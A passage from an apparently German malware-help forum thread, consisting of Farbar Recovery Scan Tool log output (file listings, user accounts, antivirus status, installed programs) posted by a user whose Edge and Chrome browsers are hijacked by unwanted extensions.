C:\Users\skysc\AppData\Local\Google 2024-07-20 14:48 - 2024-05-22 20:55 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2024-07-20 14:48 - 2024-05-22 20:55 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2024-07-20 14:39 - 2022-05-07 07:24 - 000000000 ___HD C:\Windows\ELAMBKUP 2024-07-19 20:47 - 2024-04-14 15:22 - 000004024 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2} 2024-07-19 20:47 - 2024-04-14 15:22 - 000003900 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31} 2024-07-18 14:31 - 2023-11-11 18:24 - 000002002 _____ C:\Users\skysc\Desktop\Discord.lnk 2024-07-17 19:28 - 2024-04-14 15:22 - 000002363 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk 2024-07-17 19:28 - 2024-04-14 15:22 - 000002322 _____ C:\Users\Public\Desktop\Brave.lnk 2024-07-17 19:25 - 2024-05-27 21:48 - 000000000 ____D C:\Users\skysc\AppData\Local\GUI 2024-07-17 19:24 - 2024-05-25 20:06 - 000002246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2024-07-17 19:24 - 2024-05-25 20:06 - 000002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2024-07-17 16:49 - 2022-06-22 10:36 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2024-07-16 17:08 - 2024-02-17 14:40 - 000267880 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy_4.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 002799208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000751208 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000222816 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000206440 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 
000145000 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000108136 _____ (Microsoft Corporation) C:\Windows\system32\xgamehelper.exe 2024-07-16 17:08 - 2023-08-07 17:35 - 000075368 _____ (Microsoft Corporation) C:\Windows\system32\xgamecontrol.exe 2024-07-16 15:17 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\Drivers\wd 2024-07-15 17:42 - 2024-06-04 17:29 - 000239576 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys 2024-07-12 15:57 - 2022-06-22 10:16 - 000474232 _____ C:\Windows\system32\FNTCACHE.DAT 2024-07-12 15:56 - 2023-12-14 23:09 - 000000000 ____D C:\Windows\InboxApps 2024-07-12 15:56 - 2023-10-11 20:19 - 000000000 ____D C:\Windows\system32\Microsoft-Edge-WebView 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\UUS 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemResources 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\WinMetadata 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\Sgrm 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\SecureBootUpdates 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\oobe 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellExperiences 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellComponents 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\Provisioning 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\PolicyDefinitions 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\bcastdvr 2024-07-12 14:43 - 2022-06-22 10:16 - 000003754 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2024-07-12 14:43 - 2022-06-22 10:16 - 000003630 _____ 
C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2024-07-11 14:49 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ServiceState 2024-07-09 20:55 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\USOPrivate 2024-07-09 20:51 - 2023-08-07 17:05 - 000000000 ____D C:\Windows\system32\MRT 2024-07-09 20:50 - 2023-08-07 17:05 - 194135240 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2024-07-09 20:44 - 2022-05-07 07:17 - 000000000 ____D C:\Windows\CbsTemp 2024-07-09 20:42 - 2022-06-22 10:19 - 003212800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll 2024-07-09 20:14 - 2023-09-19 15:20 - 000000000 ____D C:\Program Files (x86)\Overwolf 2024-07-01 18:05 - 2024-05-29 17:26 - 000000000 ____D C:\Users\skysc\AppData\LocalLow\Norton 2024-06-30 20:23 - 2023-08-20 18:23 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Word 2024-06-27 14:17 - 2024-05-28 21:28 - 000000000 ____D C:\ProgramData\Avast Software 2024-06-26 21:39 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Code 2024-06-24 14:31 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2024-06-24 14:24 - 2024-05-23 16:54 - 000049704 _____ C:\Users\skysc\Downloads\Lebenslauf Jessika.pdf 2024-06-24 14:08 - 2024-06-18 19:47 - 000038589 _____ C:\Users\skysc\Downloads\Bewerbung Jessika.pdf 2024-06-23 14:38 - 2023-08-07 14:19 - 000000000 ____D C:\Users\skysc\AppData\Local\PlaceholderTileLogoFolder ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======== 2023-08-14 18:17 - 2023-08-14 18:17 - 000005998 _____ () C:\Users\skysc\AppData\Local\91094746112 2024-04-06 15:56 - 2024-04-06 15:56 - 000005998 _____ () C:\Users\skysc\AppData\Local\93293858673 2023-10-13 15:29 - 2023-10-13 15:29 - 000005998 _____ () C:\Users\skysc\AppData\Local\9437468409 2023-10-22 18:46 - 2023-10-22 18:46 - 000000028 _____ () C:\Users\skysc\AppData\Local\CapCutConfigure.ini 2023-10-22 20:57 - 
2023-10-22 20:57 - 000001611 _____ () C:\Users\skysc\AppData\Local\recently-used.xbel
2024-05-25 19:34 - 2024-05-25 19:34 - 000000017 _____ () C:\Users\skysc\AppData\Local\resmon.resmoncfg

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
|
23.07.2024, 13:39 | #2 |
| Windows 11: Policy in Edge and Chrome browser cannot be disabled, loads Beautiful New Tab (Edge) and Qtr Search (Chrome) hijacker extension
Addition log:
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 21.07.2024
durchgeführt von skysc (22-07-2024 21:18:43)
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner
Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) (2023-08-07 12:09:18)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

Administrator (S-1-5-21-1221853621-2447620182-1933698513-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1221853621-2447620182-1933698513-503 - Limited - Disabled)
Gast (S-1-5-21-1221853621-2447620182-1933698513-501 - Limited - Disabled)
skysc (S-1-5-21-1221853621-2447620182-1933698513-1001 - Administrator - Enabled) => C:\Users\skysc
WDAGUtilityAccount (S-1-5-21-1221853621-2447620182-1933698513-504 - Limited - Disabled)
zweisky (S-1-5-21-1221853621-2447620182-1933698513-1002 - Limited - Enabled) => C:\Users\zweisky

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton 360 for Gamers (Disabled - Out of date) {AECE2126-F4E7-6909-11F2-1B69D1FBCBD0}
FW: Norton 360 for Gamers (Disabled) {96F5A003-BE88-6851-3AAD-B25C2F288CAB}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.)
AMD GPIO2 Driver (HKLM-x32\...\{E9DD399F-21A3-479E-A7DF-D6CF4B2ADBF3}) (Version: 2.2.0.130 - Advanced Micro Devices, Inc.)
Hidden AMD PCI Driver (HKLM-x32\...\{80EC3CEE-2940-42A1-A776-B5D810D39F1E}) (Version: 1.0.0.81 - Advanced Micro Devices, Inc.) Hidden AMD PSP Driver (HKLM-x32\...\{988F14B8-79A8-475D-BAC7-83F96AD3D821}) (Version: 4.13.0.0 - Advanced Micro Devices, Inc.) Hidden AMD Ryzen Balanced Driver (HKLM-x32\...\{A171D320-C42C-4F3B-A2D8-C6A09F6788CC}) (Version: 6.0.0.7 - Advanced Micro Devices, Inc.) Hidden AMD Ryzen Master SDK (HKLM\...\{DBD50508-5F75-416B-995D-C42433A00944}) (Version: 2.10.0.2198 - Advanced Micro Devices, Inc.) AMD SBxxx SMBus Driver Alpha (HKLM-x32\...\{AAE0E27D-C88A-49BA-8715-77ADCD4286A3}) (Version: 5.12.0.38 - Advanced Micro Devices, Inc.) Hidden AMD_Chipset_Drivers (HKLM-x32\...\{b7b5b85e-6364-4ab4-ab0f-3a89b0de0fe2}) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.) Hidden Autodesk Fusion 360 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.16976 - Autodesk, Inc.) blender (HKLM\...\{1589EDDA-7F97-49A7-A931-5646B819BC9E}) (Version: 4.1.0 - Blender Foundation) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 126.1.67.134 - Die Brave-Autoren) CapCut (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\CapCut) (Version: 2.6.0.814 - Bytedance Pte. Ltd.) Combo Cleaner (HKLM\...\{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT) Hidden Combo Cleaner (HKLM-x32\...\InstallShield_{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT) CrystalDiskInfo 9.2.3 (HKLM\...\CrystalDiskInfo_is1) (Version: 9.2.3 - Crystal Dew World) CurseForge (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Overwolf_cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj) (Version: 1.255.0.2 - Overwolf app) Discord (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Discord) (Version: 1.0.9023 - Discord Inc.) 
Easy Connection to Screen (HKLM\...\{B779166F-820A-44EE-9DAC-7F794BC8A67F}) (Version: 4.7.1 - Samsung) ENE Video Capture Box HAL (HKLM\...\{A096611D-BA11-4A1A-8D09-0A0462D7C8F2}) (Version: 1.0.5.15 - Ene Tech.) Hidden ENE Video Capture Box HAL (HKLM-x32\...\{974259bf-3ed1-4cd6-9ed1-40c7f601a786}) (Version: 1.0.5.15 - Ene Tech.) Hidden ENE_DRAM_RGB_AIO (HKLM\...\{40514BA6-1FC2-4BBD-84A2-504634A97196}) (Version: 1.0.4.16 - Ene Tech.) Hidden ENE_DRAM_RGB_AIO (HKLM-x32\...\{ca38f41e-a37c-41b2-82e3-28b215743448}) (Version: 1.0.4.16 - Ene Tech.) Hidden ENE_EHD_M2_HAL (HKLM\...\{37A48B7F-D4EA-4863-844E-A284E2AA3C5D}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden ENE_EHD_M2_HAL (HKLM-x32\...\{7cf61546-b8ec-4a85-a301-fa8c79296bd0}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden ENE_External_Device_HAL (HKLM\...\{2B8E611F-0B51-4FAC-87BB-AF50D82E7DDA}) (Version: 1.0.11.1 - ENE Tech) Hidden ENE_External_Device_HAL (HKLM-x32\...\{bb9d349f-b87b-4026-b336-1604708bd09c}) (Version: 1.0.11.1 - ENE Tech) Hidden ENE_MousePad_HAL (HKLM\...\{9E97178A-ADB8-4778-BE60-7E28E2A72721}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden ENE_MousePad_HAL (HKLM-x32\...\{c2c794a4-7986-4c45-884d-d4ca43b88df9}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden ENE_X_AIC_HAL (HKLM\...\{CF703694-01C6-4062-B797-84DB215662BC}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden ENE_X_AIC_HAL (HKLM-x32\...\{c662a481-d76a-4188-95d2-6eb4ffd55542}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.) 
Futuremark SystemInfo (HKLM-x32\...\{DB3FC272-D04E-42E1-A981-20A781A9561C}) (Version: 5.69.1204.0 - Futuremark) GIMP 2.10.34-2 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\GIMP-2_is1) (Version: 2.10.34 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 126.0.6478.182 - Google LLC) iPod-Unterstützung (HKLM\...\{5530CCC4-99F6-4198-BB1B-F1F78D6BCA76}) (Version: 12.11.3.7 - Apple Inc.) Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden LIFT 3.0 (HKLM\...\{535DCAB0-B2C4-45F1-B03D-7E7A1059B74E}) (Version: 3.2.0 - C.C.Buchner) Malwarebytes version 5.1.6.117 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 5.1.6.117 - Malwarebytes) Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - es-es (HKLM\...\O365HomePremRetail - es-es) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - fr-fr (HKLM\...\O365HomePremRetail - fr-fr) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - it-it (HKLM\...\O365HomePremRetail - it-it) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 126.0.2592.113 - Microsoft Corporation) Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 126.0.2592.113 - Microsoft Corporation) Microsoft GameInput (HKLM-x32\...\{1F2B6AF3-C260-8666-5950-E3FEDBC851D6}) (Version: 10.1.22621.3036 - Microsoft Corporation) Microsoft OneDrive (HKLM\...\OneDriveSetup.exe) (Version: 24.132.0701.0002 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{C6FD611E-7EFE-488C-A0E0-974C09EF6473}) (Version: 5.72.0.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) 
(Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (HKLM-x32\...\{8bdfe669-9705-4184-9368-db9ce581e0e7}) (Version: 14.36.32532.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (HKLM-x32\...\{410c0ee1-00bb-41b6-9772-e12c2828b02f}) (Version: 14.36.32532.0 - 
Microsoft Corporation) Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (HKLM\...\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (HKLM\...\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (HKLM-x32\...\{C2C59CAB-8766-4ABD-A8EF-1151A36C41E5}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (HKLM-x32\...\{73F77E4E-5A17-46E5-A5FC-8A061047725F}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual Studio Code (User) (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.90.2 - Microsoft Corporation) Mine-imator 1.2.9 (HKLM-x32\...\{EF61A1AA-5F85-4E94-ACC6-D5650A312AE6}}_is1) (Version: 1.2.9.2 - David Norgren) MSI Afterburner 4.6.5 (HKLM-x32\...\Afterburner) (Version: 4.6.5 - MSI Co., LTD) MSI Center SDK (HKLM-x32\...\{15289038-41BE-48F8-B8B9-0B1021D3089E}}_is1) (Version: 3.2023.1127.01 - MSI) MSIRegister (HKLM-x32\...\{80B995A4-3A86-4690-98A6-563F1A788835}_is1) (Version: 2.0.0.22 - MSI) Norton 360 (HKLM-x32\...\NGC) (Version: 22.24.2.6 - NortonLifeLock Inc) NVIDIA FrameView SDK 1.3.8513.32290073 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8513.32290073 - NVIDIA Corporation) NVIDIA GeForce Experience 3.27.0.120 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.27.0.120 - NVIDIA Corporation) NVIDIA Grafiktreiber 551.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 551.52 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.40.14 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.40.14 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.21.0713 
(HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation) OBS Studio (HKLM-x32\...\OBS Studio) (Version: 29.1.3 - OBS Project) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.15225.20150 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.15225.20194 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0410-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Opera GX Stable 109.0.5097.142 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Opera GX 109.0.5097.142) (Version: 109.0.5097.142 - Opera Software) Overwolf (HKLM-x32\...\Overwolf) (Version: 0.254.0.13 - Overwolf Ltd.) 
Patriot Viper M2 SSD RGB (HKLM\...\{8B4C0A3D-C135-4E1F-98D8-3926494B4D61}) (Version: 1.1.0.1 - Patriot Memory) Hidden Patriot Viper M2 SSD RGB (HKLM-x32\...\{07236f40-ec25-4646-8cb6-b6aaf1597324}) (Version: 1.1.0.1 - Patriot Memory) Hidden PowerToys (Preview) (HKLM\...\{92AE79ED-B1CD-425A-8111-64E61153C5E1}) (Version: 0.81.1 - Microsoft Corporation) Hidden PowerToys (Preview) x64 (HKLM-x32\...\{fca38025-53e3-439e-8a24-a3261efd2924}) (Version: 0.81.1 - Microsoft Corporation) Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9071.1 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.42.526.2020 - Realtek) Revo Uninstaller 2.4.5 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.4.5 - VS Revo Group, Ltd.) RGB Fusion (HKLM-x32\...\{FFA8F1FA-3C2C-4A94-AC0B-0DF47272C25F}) (Version: 3.22.1221.1 - Gigabyte) Shotcut (HKLM\...\Shotcut_is1) (Version: 23.09.29 - Meltytech) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 10.0.1266 - SUPERAntiSpyware.com) UltiMaker Cura 5.4.0 (HKLM-x32\...\UltiMaker Cura 5.4.0-5.4.0) (Version: 5.4.0 - UltiMaker) UltiMaker Cura 5.5.0 (HKLM-x32\...\UltiMaker Cura 5.5.0-5.5.0) (Version: 5.5.0 - UltiMaker) Uninstall Lunar Client (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 3.2.11 - Moonsworth LLC) Verbatim_SureFireGaming_Product (HKLM\...\{35CB65C6-A7E3-4EE7-AD40-738D70A72164}) (Version: 1.0.3.11 - Verbatim) Hidden Verbatim_SureFireGaming_Product (HKLM-x32\...\{d601832a-0d94-46ce-9b19-78e8a5887313}) (Version: 1.0.3.11 - Verbatim) Hidden VLC media player (HKLM\...\VLC media player) (Version: 3.0.20 - VideoLAN) WD P40 Game Drive 
(HKLM\...\{EE55DBAE-ECDD-4ADD-AAB5-23DE848B0996}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden WD P40 Game Drive (HKLM-x32\...\{72b1a866-fc31-4381-bff3-fa6cd8823777}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden WD_BLACK AN1500 (HKLM\...\{085E2365-0A70-4230-B664-02D5E4FE7E9C}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK AN1500 (HKLM-x32\...\{9c94735f-73fd-4b0f-9ddb-8be7b3cc4681}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK D50 (HKLM\...\{BDE43F26-5917-44F8-B86A-F1D9A6B80B32}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK D50 (HKLM-x32\...\{a1d1ba00-92b7-4a99-8ebd-65b25c0e9e44}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden Windows-Treiberpaket - Apple, Inc. (USBAAPL) USB (05/19/2017 6.0.9999.69) (HKLM\...\7771A0176A543725D7BBF70A546C096A4EE2DD40) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.) Windows-Treiberpaket - Apple, Inc. (USBAAPL64) USB (05/19/2017 6.0.9999.69) (HKLM\...\C2C6A29F3ABC80FD992777A92DF30699124D37C5) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.) 
WinRAR 6.23 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 6.23.0 - win.rar GmbH) Packages: ========= Atomic Heart -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.579645D26CFD_1.14.4.0_x64__4hny5m903y3g0 [2024-06-15] (Focus Home Interactive SA) Atomic Heart: Annihilation Instinct -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.1495F5E33141_1.0.0.0_x64__4hny5m903y3g0 [2023-10-13] (Focus Home Interactive SA) Atomic Heart: Trapped in Limbo -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.48903E5CC1186_1.0.0.0_x64__4hny5m903y3g0 [2024-04-06] (Focus Home Interactive SA) Copilot -> C:\Program Files\WindowsApps\Microsoft.Copilot_1.0.4.0_neutral__8wekyb3d8bbwe [2024-07-14] (Microsoft Corporation) Disney+ -> C:\Program Files\WindowsApps\Disney.37853FC22B2CE_2024.3.211.0_neutral__6rarf9sa4v8jt [2024-07-14] (Disney) EarTrumpet -> C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne [2024-07-14] (File-New-Project) [Startup Task] Hello Neighbor 2 -> C:\Program Files\WindowsApps\tinyBuildGames.HelloNeighbor2_1.3.6.0_x64__3sz1pp2ynv2xe [2024-06-15] (tinyBuild Games) High on Life -> C:\Program Files\WindowsApps\2637SquanchGamesInc.HighonLife_1.13.3652.0_x64__mh7dg3tfmz2cj [2024-06-15] (Squanch Games Inc.) Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.23.0_neutral__8xx8rvfyw5nnt [2024-07-14] (Instagram) iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa [2024-05-22] (Apple Inc.) [Startup Task] Microsoft Family -> C:\Program Files\WindowsApps\MicrosoftCorporationII.MicrosoftFamily_0.2.40.0_x64__8wekyb3d8bbwe [2023-11-09] (Microsoft Corp.) 
